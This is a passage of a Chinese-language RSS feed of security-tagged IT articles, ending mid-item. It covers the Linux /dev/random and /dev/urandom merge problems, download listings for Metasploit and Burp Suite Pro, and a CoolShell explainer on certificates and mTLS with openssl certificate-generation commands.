<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="/rss.xsl" type="text/xsl"?>
<rss version="2.0">
  <channel>
    <title>IT瘾security推荐</title>
    <link>https://itindex.net/tags/security</link>
    <description>IT社区推荐资讯 - ITIndex.net</description>
    <language>zh</language>
    <copyright>https://itindex.net/</copyright>
    <generator>https://itindex.net/</generator>
    <docs>http://backend.userland.com/rss</docs>
    <image>
      <url>https://itindex.net/images/logo.gif</url>
      <title>IT社区推荐资讯 - ITIndex.net</title>
      <link>https://itindex.net/tags/security</link>
    </image>
    <item>
      <title>Linux 打算合併 /dev/random 與 /dev/urandom 遇到的問題</title>
      <link>https://itindex.net/detail/62186-linux-dev-random</link>
      <description>&lt;p&gt;在   &lt;a href="https://news.ycombinator.com/"&gt;Hacker News&lt;/a&gt; 上看到「  &lt;a href="https://news.ycombinator.com/item?id=30848973"&gt;Problems emerge for a unified /dev/*random (lwn.net)&lt;/a&gt;」的，原文是「  &lt;a href="https://lwn.net/Articles/889452/"&gt;Problems emerge for a unified /dev/*random&lt;/a&gt;」(付費內容，但是可以透過 Hacker News 上的連結直接看)。&lt;/p&gt;
 &lt;p&gt;標題提到的兩個 device 的性質會需要一些背景知識，可以參考維基百科上面「  &lt;a href="https://en.wikipedia.org/wiki//dev/random"&gt;/dev/random&lt;/a&gt;」這篇的說明，兩個都是   &lt;a href="https://en.wikipedia.org/wiki/Cryptographically-secure_pseudorandom_number_generator"&gt;CSPRNG&lt;/a&gt;，主要的分別在於   &lt;code&gt;/dev/urandom&lt;/code&gt; 通常不會 block：&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;The    &lt;code&gt;/dev/urandom&lt;/code&gt; device typically was never a blocking device, even if the pseudorandom number generator seed was not fully initialized with entropy since boot.&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;而   &lt;code&gt;/dev/random&lt;/code&gt; 不保證不會 block，有可能會因為 entropy 不夠而卡住：&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;   &lt;code&gt;/dev/random&lt;/code&gt; typically blocked if there was less entropy available than requested; more recently (see below, different OS&amp;apos;s differ) it usually blocks at startup until sufficient entropy has been gathered, then unblocks permanently.&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;然後順便講一下，因為這是 crypto 相關的設計修改，加上是 kernel level 的界面，安全性以及相容性都會是很在意的點，而 Hacker News 上的討論裡面很多是不太在意這些的，你會看到很多「很有趣」的想法在上面討論 XDDD&lt;/p&gt;
 &lt;p&gt;回到原來的文章，Jason A. Donenfeld (Linux kernel 裡 RNG maintainer 之一，不過近期比較知名的事情還是   &lt;a href="https://www.wireguard.com/"&gt;WireGuard&lt;/a&gt; 的發明人) 最近不斷的在改善 Linux kernel 裡面這塊架構，這次打算直接拿   &lt;code&gt;/dev/random&lt;/code&gt; 換掉   &lt;code&gt;/dev/urandom&lt;/code&gt;：「  &lt;a href="https://lwn.net/Articles/884875/"&gt;Uniting the Linux random-number devices&lt;/a&gt;」。&lt;/p&gt;
 &lt;p&gt;不過換完後   &lt;a href="https://www.google.com/"&gt;Google&lt;/a&gt; 的 Guenter Roeck 就在抱怨在   &lt;a href="https://www.qemu.org/"&gt;QEMU&lt;/a&gt; 環境裡面炸掉了：&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;This patch (or a later version of it) made it into mainline and causes a large number of qemu boot test failures for various architectures (arm, m68k, microblaze, sparc32, xtensa are the ones I observed). Common denominator is that boot hangs at &amp;quot;Saving random seed:&amp;quot;. A sample bisect log is attached. Reverting this patch fixes the problem.&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;他透過   &lt;a href="https://git-scm.com/docs/git-bisect"&gt;git bisect&lt;/a&gt; 找到發生問題的 commit，另外從卡住的訊息也可以大概猜到在虛擬機下 entropy 不太夠。&lt;/p&gt;
 &lt;p&gt;另外從他們三個 (加上   &lt;a href="https://en.wikipedia.org/wiki/Linus_Torvalds"&gt;Linus&lt;/a&gt;) 在 mailing list 上面討論的訊息可以看到不少交流：「  &lt;a href="https://lwn.net/ml/linux-kernel/YjoC5kQMqyC%2F3L5Y@zx2c4.com/"&gt;Re: [PATCH v1] random: block in /dev/urandom&lt;/a&gt;」，包括嘗試「餵」entropy 進   &lt;code&gt;/dev/urandom&lt;/code&gt; 的 code...&lt;/p&gt;
 &lt;p&gt;後續看起來還會有一些嘗試，但短期內看起來應該還是會先分開...&lt;/p&gt;
&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Computer Linux Murmuring OS Security</category>
      <guid isPermaLink="true">https://itindex.net/detail/62186-linux-dev-random</guid>
      <pubDate>Sun, 03 Apr 2022 12:33:00 CST</pubDate>
    </item>
    <item>
      <title>Metasploit Framework 6.1.32+20220303 (macOS, Linux, Windows) -- 渗透测试框架</title>
      <link>https://itindex.net/detail/62141-metasploit-framework-macos</link>
      <description>&lt;p&gt;请访问原文链接：  &lt;a href="https://sysin.org/blog/metasploit-framework-6/" title="Metasploit Framework 6.1.32+20220303 (macOS, Linux, Windows) -- &amp;#28183;&amp;#36879;&amp;#27979;&amp;#35797;&amp;#26694;&amp;#26550;"&gt;Metasploit Framework 6.1.32+20220303 (macOS, Linux, Windows) -- 渗透测试框架&lt;/a&gt;，查看最新版。原创作品，转载请保留出处。&lt;/p&gt; &lt;p&gt;作者主页：  &lt;a href="https://sysin.org"&gt;www.sysin.org&lt;/a&gt;&lt;/p&gt; &lt;p&gt;  &lt;img alt="img" src="https://www.metasploit.com/includes/images/metasploit-logo.svg"&gt;&lt;/img&gt;&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://sysin.org/#&amp;#19990;&amp;#30028;&amp;#19978;&amp;#26368;&amp;#24191;&amp;#27867;&amp;#20351;&amp;#29992;&amp;#30340;&amp;#28183;&amp;#36879;&amp;#27979;&amp;#35797;&amp;#26694;&amp;#26550;" title="&amp;#19990;&amp;#30028;&amp;#19978;&amp;#26368;&amp;#24191;&amp;#27867;&amp;#20351;&amp;#29992;&amp;#30340;&amp;#28183;&amp;#36879;&amp;#27979;&amp;#35797;&amp;#26694;&amp;#26550;"&gt;&lt;/a&gt;世界上最广泛使用的渗透测试框架&lt;/h2&gt; &lt;p&gt;知识就是力量，尤其是当它被分享时。作为开源社区和 Rapid7 之间的合作，Metasploit 帮助安全团队做的不仅仅是验证漏洞、管理安全评估和提高安全意识；它使防守队员能够始终领先比赛一步（或两步）。&lt;/p&gt; &lt;p&gt;  &lt;img alt="dashboard" src="https://res.cloudinary.com/spiralyze/image/upload/f_auto/RAPID7/1401:%20Metasploit%20Trial%20-%20Redesign/Dashboard_1440.png"&gt;&lt;/img&gt;&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://sysin.org/#&amp;#29256;&amp;#26412;&amp;#27604;&amp;#36739;" title="&amp;#29256;&amp;#26412;&amp;#27604;&amp;#36739;"&gt;&lt;/a&gt;版本比较&lt;/h2&gt; &lt;h3&gt;  &lt;a href="https://sysin.org/#Open-Source-Metasploit-Framework" title="Open Source: Metasploit Framework"&gt;&lt;/a&gt;Open Source: Metasploit Framework&lt;/h3&gt; &lt;p&gt;  &lt;a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers" rel="noopener" target="_blank"&gt;Download&lt;/a&gt;&lt;/p&gt; &lt;h3&gt;  &lt;a href="https://sysin.org/#Commercial-Support-Metasploit-Pro" title="Commercial Support: Metasploit Pro"&gt;&lt;/a&gt;Commercial Support: Metasploit Pro&lt;/h3&gt; &lt;p&gt;  &lt;img alt="metasploit-editions-compare" src="https://sysin.org/metasploit-editions-compare.webp"&gt;&lt;/img&gt;&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://sysin.org/#&amp;#19979;&amp;#36733;&amp;#22320;&amp;#22336;" title="&amp;#19979;&amp;#36733;&amp;#22320;&amp;#22336;"&gt;&lt;/a&gt;下载地址&lt;/h2&gt; &lt;p&gt;macOS：metasploit-framework-VERSION.x86_64.pkg  &lt;br /&gt;Windows：metasploit-framework-VERSION-x64.msi  &lt;br /&gt;Linux deb x64：metasploit-framework_VERSION_amd64.deb  &lt;br /&gt;Linux deb x86：metasploit-framework_VERSION_i386.deb  &lt;br /&gt;Linux deb arm64：metasploit-framework_VERSION_arm64.deb  &lt;br /&gt;Linux rpm x64：metasploit-framework-VERSION.el6.x86_64.rpm&lt;/p&gt; &lt;p&gt;百度网盘链接：  &lt;a href="https://pan.baidu.com/s/14jnv2S4EhzdHr3cWnwfNJA" rel="noopener" target="_blank"&gt;https://pan.baidu.com/s/14jnv2S4EhzdHr3cWnwfNJA&lt;/a&gt;  提取码：17p9&lt;/p&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Download macOS Linux Windows Security</category>
      <guid isPermaLink="true">https://itindex.net/detail/62141-metasploit-framework-macos</guid>
      <pubDate>Fri, 04 Mar 2022 15:03:00 CST</pubDate>
    </item>
    <item>
      <title>网络数字身份认证术</title>
      <link>https://itindex.net/detail/61989-%E7%BD%91%E7%BB%9C-%E6%95%B0%E5%AD%97%E8%BA%AB%E4%BB%BD-%E8%AE%A4%E8%AF%81</link>
      <description>&lt;p&gt;  &lt;img alt="" height="201" src="https://coolshell.cn/wp-content/uploads/2022/01/iStock-1175502114-300x201.png" width="300"&gt;&lt;/img&gt;这篇文章是《  &lt;a href="https://coolshell.cn/articles/19395.html" rel="noopener" target="_blank" title="HTTP API &amp;#35748;&amp;#35777;&amp;#25480;&amp;#26435;&amp;#26415;"&gt;HTTP API 认证授权术&lt;/a&gt;》的姊妹篇，在那篇文章中，主要介绍了 HTTP API 认证和授权技术中用到的 HTTP Basic, Digest Access, HMAC, OAuth, JWT 等各种方式，主要是 API 上用到的一些技术，这篇文章主要想说的是另一个话题——身份认证。也就是说，怎么确认这个数据就是这个人发出来的？&lt;/p&gt;
 &lt;h4&gt;用户密码&lt;/h4&gt;
 &lt;p&gt;要解决这个问题，我们先来看一个最简单的解——使用密码，通常来说，在网络上要证明一个人的身份的话，都需要这个人的一些私密而唯一的东西。比如，像密码这样的东西，很多地方，只要你提供了你的用户名+密码，就可以确定这个人是你（注明：关于密码管理，强密码设定，密码泄漏，密码破解以及密码哄骗不在这篇文章的话题中），也就是说，这个密码是非常私密的事，我们可以假设，这个事全世界只能有当事人一个人知道，所以，当当事人得供正确的密码，我们就可以认证这个人了。&lt;/p&gt;
 &lt;p&gt;为了加强密码的安全程度，一般会使用 2FA（Two-factor authentication）或 MFA（Multi-factor authentication），双因认证或多因认证，这需要用户提供一个唯一的可信设备，比如用户的手机，然后通过验证手机短信，或是像   &lt;a href="https://en.wikipedia.org/wiki/Google_Authenticator" rel="noopener" target="_blank"&gt;Google Authenticator&lt;/a&gt;  这样的动态口令来完成。这样的安全级别已经算是比较高了。如果能够再加上经常性的变更密码，那么密全级别就更好了。&lt;/p&gt;
 &lt;p&gt;&lt;/p&gt;
 &lt;p&gt;另外，一些公司还使用了生物密码来进行用户的身份验证，比如人脸识别。但是，我个人觉得人脸识别或是生物识别是比较糟糕的方式，因为：&lt;/p&gt;
 &lt;ul&gt;
  &lt;li&gt;目前能被验证的生物信息（如人脸和指纹）太容易被别人获得和伪造了。&lt;/li&gt;
  &lt;li&gt;这样东西不能被变更和吊销，密码可以被吊销和重置，人脸则不能。&lt;/li&gt;
&lt;/ul&gt;
 &lt;h4&gt;密钥对和证书&lt;/h4&gt;
 &lt;p&gt;密码可以解决身证认证的问题有很多问题，最重要的一个问题就是，你要把你的密码提供给对方，对方才能验证你的身份。你不可能把你的密码提供给全世界的人吧，这样的话，全世界的人都有你的密码了，那么任何人都能变成你了。所以，用户密码这个事只能存在于权威机构和普通用户之间，不能存在于普遍应用中。所以，这里需要使用更好的解决方案。&lt;/p&gt;
 &lt;p&gt;使用 ECC（  &lt;a href="https://en.wikipedia.org/wiki/Elliptic-curve_cryptography" rel="noopener" target="_blank" title="Elliptic-Curve Cryptography"&gt;Elliptic-Curve Cryptography&lt;/a&gt;）椭圆曲线密码术，可以通过一个“密钥对”进行非对称加密。这种技术，在对信息进行加密和解密时，使用两个不同的密钥，其中一个用来做加密，另一个做解密。这样一来，我们就可以把其中一个密钥公布出去，称之为公钥，另一个密钥私密地保管好，称之为私钥。&lt;/p&gt;
 &lt;p&gt;比如，我用我的私钥加密信息，然后，我把这个私钥所配对的公钥发布给所有人，大家都用公钥解密信息，不用我的公钥你解密不了这个信息。这样一来，就可以保证这个信息是我发出来的，不但保证了信息安全，还完成了身份认证。&lt;/p&gt;
 &lt;p&gt;  &lt;img alt="" height="244" src="https://coolshell.cn/wp-content/uploads/2022/01/key.pair_-1024x390.png" width="640"&gt;&lt;/img&gt;&lt;/p&gt;
 &lt;p&gt;这样的现实案例一般用于网站，也就是用户得要知道我访问的这个网站是真实的，不是别人做的。因为 DNS 很容易被 hack，你连上一个不可信的网络，这个网络里的 DNS 把这个网站的 IP 地址解析成什么 就是什么了。但是有了这个加密的机制后，网站把自己的信息加密后连同公钥给到访问者，访问解密后就知道是不是这个网站了。&lt;/p&gt;
 &lt;p&gt;但是，这里还是会有一个很严重的问题，那就是中间人攻击。如下图所示：&lt;/p&gt;
 &lt;p&gt;  &lt;img alt="" height="252" src="https://coolshell.cn/wp-content/uploads/2022/01/middle.man_-e1641105543137.png" width="600"&gt;&lt;/img&gt;&lt;/p&gt;
 &lt;p&gt;中间人 Chad 把 伪装成 Bob 向 Alice 要信息，然后，再伪装成 Alice 对 Bob 说，这就是 Alice 的公钥，于是 Bob 也无法验证是不是 Alice 的公钥，因为公钥里就是一堆乱七八糟的数据，我们完全不能分辨哪个公钥属于 Alice 的。试想，如果我们收到声称属于银行的密钥。我们怎么知道它确实属于你的银行？&lt;/p&gt;
 &lt;p&gt;这里的答案就是  &lt;strong&gt;使用数字证书&lt;/strong&gt;。证书跟我们的身份证非常类似，其需要一个可信机构来颁发和验证的。这个证书机构 CA（Certificate Authority）是一个是大家都相信的权威机构，他用他的人品保证（当然一般会被严格管理和审计），CA 机构同样使用这样的非对称加密的技术来完成颁发和验证的事。下图展示了这一过程。&lt;/p&gt;
 &lt;p&gt;  &lt;img alt="" height="333" src="https://coolshell.cn/wp-content/uploads/2022/01/certificate-1024x532.png" width="640"&gt;&lt;/img&gt;&lt;/p&gt;
 &lt;p&gt;说明一下上面这个图：&lt;/p&gt;
 &lt;ol&gt;
  &lt;li&gt;为了解决公钥认证的问题的，我们需要一个权威的CA 机构。&lt;/li&gt;
  &lt;li&gt;Alice 把自己的信息（姓名、组织，地址，电邮，网址等 ）和自己的公钥打包成一个 CSR 的文件，发给 CA 机构，&lt;/li&gt;
  &lt;li&gt;CA 机构会来找 Alice 做物理世界的认证，如果通过后，就会用自己的机构私钥，把CSR 变成一个签名证书。&lt;/li&gt;
  &lt;li&gt;Bob 同学拿到 Alice 的证书，用 CA 机构的公钥解密后，得到 Alice 的公钥&lt;/li&gt;
  &lt;li&gt;后面就可以签证 信息是否来自 Alice 了。&lt;/li&gt;
&lt;/ol&gt;
 &lt;p&gt;是的，这个过程就是在“套娃”，这种证书机构还可以给下级的证书机构发证，于是就会一层套一层地，形成一个证书链，顶层的叫根证书，你得绝对信任之。对于验证证书真实性的客户端，它需要能够验证链中所有 CA 的签名，这意味着客户端需要访问链中所有 CA 的证书。&lt;/p&gt;
 &lt;h4&gt;证书生成过程演示&lt;/h4&gt;
 &lt;p&gt;并不是所有的场景都需要向这些大型的 CA 机构申请公钥证书，在任何一个企业，组织或是团体内都可以自己形这样的“小王国”，也就是说，你可以自行生成这样的证书，只需要你自己保证自己的生成证书的私钥的安全，以及不需要扩散到整个互联网。下面，我们用   &lt;code&gt;openssl&lt;/code&gt;命令来演示这个过程。&lt;/p&gt;
 &lt;p&gt;1）生成 CA 的证书（公钥）   &lt;code&gt;ca.crt&lt;/code&gt; 和私钥   &lt;code&gt;ca.key&lt;/code&gt;&lt;/p&gt;
 &lt;pre&gt;openssl req -newkey rsa:2048 \
    -new -nodes -x509 \
    -days 365 \
    -out ca.crt \
    -keyout ca.key \
    -subj &amp;quot;/C=SO/ST=Earth/L=Mountain/O=CoolShell/OU=HQ/CN=localhost&amp;quot;&lt;/pre&gt;
 &lt;p&gt;2)  生成 alice 的私钥&lt;/p&gt;
 &lt;pre&gt;openssl genrsa -out alice.key 2048&lt;/pre&gt;
 &lt;p&gt;3）生成 Alice 的 CSR – Certificate Signing Request&lt;/p&gt;
 &lt;pre&gt;openssl req -new -key alice.key 365 -out alice.csr \
    -subj &amp;quot;/C=CN/ST=Beijing/L=Haidian/O=CoolShell/OU=Test/CN=localhost.alice&amp;quot;&lt;/pre&gt;
 &lt;p&gt;4）使用 CA 给 Alice 签名证书&lt;/p&gt;
 &lt;pre&gt;openssl x509  -req -in alice.csr \
    -extfile &amp;lt;(printf &amp;quot;subjectAltName=DNS:localhost.alice&amp;quot;) \ 
    -CA ca.crt -CAkey ca.key  \
    -days 365 -sha256 -CAcreateserial \
    -out alice.crt&lt;/pre&gt;
 &lt;h4&gt;双向认证 mTLS&lt;/h4&gt;
 &lt;p&gt;上面，我们说的基本上都是单向认证，大量的场景都是确保用户方访问的是真正的服务方，如：银行，电商网站，等。这样可以保证用户不会被钓鱼网站或是中间人攻击。但是，很多时候，我们也是需要双向认证的。下面是一个典型的场景——微信支付和商户间交互&lt;/p&gt;
 &lt;ul&gt;
  &lt;li&gt;用户到商家那边买东西，商家要求用户进行支付。&lt;/li&gt;
  &lt;li&gt;用户选择了微信支付，于是，界面从商户侧切到了微信侧&lt;/li&gt;
  &lt;li&gt;微信那边支付完成后，商户这边收到微信那边支付完成的通知，于是开始发货。&lt;/li&gt;
&lt;/ul&gt;
 &lt;p&gt;这个过程中有件事非常重要——就是微信通知商户支付完成的时候。&lt;/p&gt;
 &lt;ul&gt;
  &lt;li&gt;微信得确保通知到的就是用户所支付商户，而不是别个。&lt;/li&gt;
  &lt;li&gt;商户也得要能确认，来通知我的就是微信，不是别人。&lt;/li&gt;
&lt;/ul&gt;
 &lt;p&gt;一般来说，微信会给商户一个 AppID和一个 AppSerct，用这个来确保是我认证过的商户来调用我，然后，需要商户在自己的系统里填一个回调的 URL，并通过平台设置的 key来做 MD5/HMAC的签名来确保是官方的回调。这都是在《  &lt;a href="https://coolshell.cn/articles/19395.html" rel="noopener" target="_blank" title="HTTP API &amp;#35748;&amp;#35777;&amp;#25480;&amp;#26435;&amp;#26415;"&gt;HTTP API 认证授权术&lt;/a&gt;》中提到过的技术，是相对传统的技术。&lt;/p&gt;
 &lt;p&gt;如今，  &lt;strong&gt;mTLS是&lt;/strong&gt;确保云原生应用程序中服务之间的通信安全的首选协议。 也就是双向认证。&lt;/p&gt;
 &lt;p&gt;传统的 TLS 认证过程是：&lt;/p&gt;
 &lt;ol&gt;
  &lt;li&gt;客户端连接到服务器&lt;/li&gt;
  &lt;li&gt;服务器提供其 TLS 证书&lt;/li&gt;
  &lt;li&gt;客户端验证服务器的证书&lt;/li&gt;
  &lt;li&gt;客户端和服务器通过加密的 TLS 连接交换信息&lt;/li&gt;
&lt;/ol&gt;
 &lt;p&gt;在 mTLS 中，客户端和服务器都有一个证书，双方都使用他们的公钥/私钥对进行身份验证。与常规 TLS 相比，mTLS 中有额外的步骤来验证双方（以  &lt;strong&gt;粗体显示的&lt;/strong&gt;额外步骤）：&lt;/p&gt;
 &lt;ol&gt;
  &lt;li&gt;客户端连接到服务器&lt;/li&gt;
  &lt;li&gt;服务器提供其 TLS 证书&lt;/li&gt;
  &lt;li&gt;客户端验证服务器的证书&lt;/li&gt;
  &lt;li&gt;   &lt;strong&gt;客户端出示其 TLS 证书&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;strong&gt;服务器验证客户端的证书&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;strong&gt;服务器授予访问权限&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;客户端和服务器通过加密的 TLS 连接交换信息&lt;/li&gt;
&lt;/ol&gt;
 &lt;p&gt;mTLS 需要“根”TLS 证书；这我们自己来完成证书颁发机构的职责。授权客户端和服务器使用的证书必须与此根证书相对应。根证书是自签名的，这意味着我们需要自己创建它。（注：此方法不适用于公共 Internet 上的单向 TLS，因为外部证书颁发机构必须颁发这些证书）&lt;/p&gt;
 &lt;p&gt;那么，为什么整个互联网上都用了 TLS 了，为什么 不升级一下使用 mTLS？这里有两方面的原因：&lt;/p&gt;
 &lt;ul&gt;
  &lt;li&gt;公共互联网上要解决的问题是：A) 确保用户访问到的是正确的网站，而不是钓鱼网站。B）网站传输的内容是安全和私密且不会被篡改的。&lt;/li&gt;
  &lt;li&gt;将 TLS 证书分发到所有最终用户设备将非常困难。生成、管理和验证为此所需的数十亿个证书几乎是不可能的任务。&lt;/li&gt;
&lt;/ul&gt;
 &lt;p&gt;在较小的范围内，mTLS 对于单个组织非常有用且非常实用，尤其是当这些组织采用零信任方法来确保网络安全时。由于默认情况下零信任方法不信任任何用户、设备或请求，因此组织必须能够在每次尝试访问网络中的任何点时对每个用户、设备和请求进行身份验证。mTLS 通过对用户进行身份验证和设备验证来帮助实现这一目标。&lt;/p&gt;
 &lt;p&gt;关于 mTLS，这里有一个我用 Golang 写的示例 –   &lt;a href="https://github.com/haoel/mTLS" rel="noopener" target="_blank"&gt;https://github.com/haoel/mTLS&lt;/a&gt;，大家可以参考一下。&lt;/p&gt;
 &lt;p&gt;P.S. 本文图版中的卡司来自安全圈的标准 Cast，参看  &lt;a href="https://en.wikipedia.org/wiki/Alice_and_Bob" rel="noopener" target="_blank"&gt; Alice and Bob&lt;/a&gt;。&lt;/p&gt;
 &lt;p&gt;（全文完）&lt;/p&gt;
 &lt;p align="center"&gt;  &lt;img src="https://coolshell.cn/wp-content/uploads/2020/03/coolshell.weixin.jpg"&gt;&lt;/img&gt;   &lt;img height="300" src="https://coolshell.cn/wp-content/uploads/2020/03/coolshell.mini_.jpg" width="300"&gt;&lt;/img&gt;   &lt;br /&gt;关注CoolShell微信公众账号和微信小程序&lt;/p&gt;
 &lt;div&gt;
  &lt;p align="center"&gt;   &lt;strong&gt;（转载本站文章请注明作者和出处     &lt;a href="https://coolshell.cn/"&gt;酷 壳 – CoolShell&lt;/a&gt; ，请勿用于任何商业用途）&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
 &lt;div&gt;——===   &lt;strong&gt;访问    &lt;a href="http://coolshell.cn/404/" target="_blank"&gt;酷壳404页面&lt;/a&gt; 寻找遗失儿童。&lt;/strong&gt; ===——&lt;/div&gt;

 &lt;div&gt;  &lt;div&gt;   &lt;h3&gt;相关文章&lt;/h3&gt;   &lt;ul&gt;    &lt;li&gt;     &lt;a href="https://coolshell.cn/articles/19395.html"&gt;      &lt;img alt="HTTP API &amp;#35748;&amp;#35777;&amp;#25480;&amp;#26435;&amp;#26415;" height="150" src="https://coolshell.cn/wp-content/uploads/2019/05/Authorization-360x200-1-150x150.png" width="150"&gt;&lt;/img&gt;&lt;/a&gt;     &lt;a href="https://coolshell.cn/articles/19395.html"&gt;HTTP API 认证授权术&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="https://coolshell.cn/articles/21003.html"&gt;      &lt;img alt="&amp;#35745;&amp;#26102;&amp;#25915;&amp;#20987; Timing Attacks" height="150" src="https://coolshell.cn/wp-content/uploads/2020/06/time-bomb-150x150.png" width="150"&gt;&lt;/img&gt;&lt;/a&gt;     &lt;a href="https://coolshell.cn/articles/21003.html"&gt;计时攻击 Timing Attacks&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="https://coolshell.cn/articles/19840.html"&gt;      &lt;img alt="HTTP&amp;#30340;&amp;#21069;&amp;#19990;&amp;#20170;&amp;#29983;" height="150" src="https://coolshell.cn/wp-content/uploads/2019/10/HTTP-770x513-300x200-1-150x150.jpg" width="150"&gt;&lt;/img&gt;&lt;/a&gt;     &lt;a href="https://coolshell.cn/articles/19840.html"&gt;HTTP的前世今生&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="https://coolshell.cn/articles/18094.html"&gt;      &lt;img alt="&amp;#22914;&amp;#20309;&amp;#20813;&amp;#36153;&amp;#30340;&amp;#35753;&amp;#32593;&amp;#31449;&amp;#21551;&amp;#29992;HTTPS" height="150" src="https://coolshell.cn/wp-content/uploads/2017/08/enable-https-banner-150x150.png" width="150"&gt;&lt;/img&gt;&lt;/a&gt;     &lt;a href="https://coolshell.cn/articles/18094.html"&gt;如何免费的让网站启用HTTPS&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="https://coolshell.cn/articles/17607.html"&gt;      &lt;img alt="&amp;#20174; MongoDB &amp;#8220;&amp;#36174;&amp;#37329;&amp;#20107;&amp;#20214;&amp;#8221; &amp;#30475;&amp;#23433;&amp;#20840;&amp;#38382;&amp;#39064;" height="150" src="https://coolshell.cn/wp-content/uploads/2017/01/MongoDB-150x150.jpg" width="150"&gt;&lt;/img&gt;&lt;/a&gt;     &lt;a href="https://coolshell.cn/articles/17607.html"&gt;从 MongoDB “赎金事件” 看安全问题&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="https://coolshell.cn/articles/17066.html"&gt;      &lt;img alt="&amp;#20851;&amp;#20110;&amp;#31227;&amp;#21160;&amp;#31471;&amp;#30340;&amp;#38035;&amp;#40060;&amp;#24335;&amp;#25915;&amp;#20987;" height="150" src="https://coolshell.cn/wp-content/uploads/2015/04/phishing-1-150x150.jpg" width="150"&gt;&lt;/img&gt;&lt;/a&gt;     &lt;a href="https://coolshell.cn/articles/17066.html"&gt;关于移动端的钓鱼式攻击&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;The post  &lt;a href="https://coolshell.cn/articles/21708.html"&gt;网络数字身份认证术&lt;/a&gt; first appeared on  &lt;a href="https://coolshell.cn"&gt;酷 壳 - CoolShell&lt;/a&gt;.&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>程序设计 网络安全 mTLS Security TLS</category>
      <guid isPermaLink="true">https://itindex.net/detail/61989-%E7%BD%91%E7%BB%9C-%E6%95%B0%E5%AD%97%E8%BA%AB%E4%BB%BD-%E8%AE%A4%E8%AF%81</guid>
      <pubDate>Sun, 02 Jan 2022 16:38:13 CST</pubDate>
    </item>
    <item>
      <title>Burp Suite Pro 2021.10 (macOS, Linux) -- 查找、发现和利用漏洞</title>
      <link>https://itindex.net/detail/61867-burp-suite-pro</link>
      <description>&lt;p&gt;请访问原文链接：  &lt;a href="https://sysin.org/blog/burp-suite-pro-2021/" title="Burp Suite Pro 2021 (macOS, Linux) -- &amp;#26597;&amp;#25214;&amp;#12289;&amp;#21457;&amp;#29616;&amp;#21644;&amp;#21033;&amp;#29992;&amp;#28431;&amp;#27934;"&gt;Burp Suite Pro 2021 (macOS, Linux) -- 查找、发现和利用漏洞&lt;/a&gt;，查看最新版。原创作品，转载请保留出处。&lt;/p&gt; &lt;p&gt;作者：gc(at)sysin.org，主页：  &lt;a href="https://sysin.org"&gt;www.sysin.org&lt;/a&gt;&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://sysin.org/#&amp;#31616;&amp;#20171;" title="&amp;#31616;&amp;#20171;"&gt;&lt;/a&gt;简介&lt;/h2&gt; &lt;p&gt;Burp Suite Professional 是一套用于测试 web 安全性的高级工具集 —- 所有这些都在一个产品中。从一个基本的拦截代理到尖端的 Burp 扫描器，使用 Burp Suite Pro，正确的工具只需点击一下就可以了。&lt;/p&gt; &lt;p&gt;我们强大的自动化让您有更多的机会做您最擅长的，而 Burp Suite 处理容易实现的目标。先进的手动工具将帮助你识别目标更微妙的盲点。&lt;/p&gt; &lt;p&gt;Burp Suite Pro 是由一个研究团队开发的。这意味着在我们发布之前，发现成果已经包含在我们的最新更新中。我们的 pentesting 工具将使您的工作更快，同时让您了解最新的攻击向量。&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://sysin.org/#&amp;#21151;&amp;#33021;&amp;#20171;&amp;#32461;" title="&amp;#21151;&amp;#33021;&amp;#20171;&amp;#32461;"&gt;&lt;/a&gt;功能介绍&lt;/h2&gt; &lt;h3&gt;  &lt;a href="https://sysin.org/#Manual-penetration-testing-features-&amp;#25163;&amp;#21160;&amp;#28183;&amp;#36879;&amp;#27979;&amp;#35797;&amp;#21151;&amp;#33021;" title="Manual penetration testing features &amp;#25163;&amp;#21160;&amp;#28183;&amp;#36879;&amp;#27979;&amp;#35797;&amp;#21151;&amp;#33021;"&gt;&lt;/a&gt;Manual penetration testing features 手动渗透测试功能&lt;/h3&gt; &lt;p&gt;  &lt;img alt="Burp Suite Pro proxy interception" src="https://portswigger.net/burp/pro/features/images/proxy-interception.png"&gt;&lt;/img&gt;&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Intercept everything your browser sees&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;A powerful proxy/history lets you modify all HTTP(S) communications passing through your browser.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Manage recon data&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;All target data is aggregated and stored in a target site map - with filtering and annotation functions.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Expose hidden attack surface&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Find hidden target functionality with an advanced automatic 